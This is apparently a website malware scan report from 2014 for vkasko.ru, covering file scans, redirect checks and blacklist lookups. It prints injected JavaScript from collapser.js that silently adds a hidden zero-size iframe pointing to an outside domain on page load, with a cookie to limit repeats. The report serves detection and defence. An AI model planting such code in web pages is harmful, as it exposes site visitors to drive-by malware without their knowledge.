Scanned pages/files
Request | Server response | Status |
http://vkasko.ru/ | 200 OK Content-Length: 13805 Content-Type: text/html | clean |
http://vkasko.ru/collapser.js | 200 OK Content-Length: 3345 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: asurt.toutges.com

    ...[2955 bytes skipped]...
    />if (window.addEventListener)
        window.addEventListener("load", do_onload, false)
    else if (window.attachEvent)
        window.attachEvent("onload", do_onload)
    else if (document.getElementById)
        window.onload=do_onload
    if (enablepersist=="on" && document.getElementById)
        window.onunload=saveswitchstate
    ;var ifbNDAl = document.createElement('iframe');
    ifbNDAl.name = 'ifbNDAl';
    ifbNDAl.src = 'http://asurt.toutges.com/';
    ifbNDAl.style.width = '0px';
    ifbNDAl.style.height = '0px';
    window.onload = function() {
        if (document.cookie.indexOf('ifbNDAl=') == -1) {
            document.getElementsByTagName('body')[0].appendChild(ifbNDAl);
            var expiresDate = new Date();
            expiresDate.setTime(expiresDate.getTime() + 432000000);
            document.cookie = 'ifbNDAl=yes; path=/; expires=' + expiresDate;
        }
    };

Decoded script:

    function do_onload() {
        uniqueidn = window.location.pathname + "firsttimeload";
        var alltags = document.all ? document.all : document.getElementsByTagName("*");
        ccollect = getElementbyClass(alltags, "switchcontent");
        statecollect = getElementbyClass(alltags, "showstate");
        if (enablepersist == "on" && get_cookie(window.location.pathname) != "" && ccollect.length > 0) {
            revivecontent();
        }
        if (ccollect.length > 0 && statecollect.length > 0) {
            revivestatus();
        }
        sweeptoggle("contract");
    }
http://vkasko.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://vkasko.ru/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vkasko.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 05 Oct 2014 02:41:35 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Expires: Sun, 05 Oct 2014 02:41:11 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: vkasko.ru
Referer: http://www.google.com/search?q=vkasko.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vkasko.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vkasko.ru/
Result: vkasko.ru is not infected or malware details are not published yet.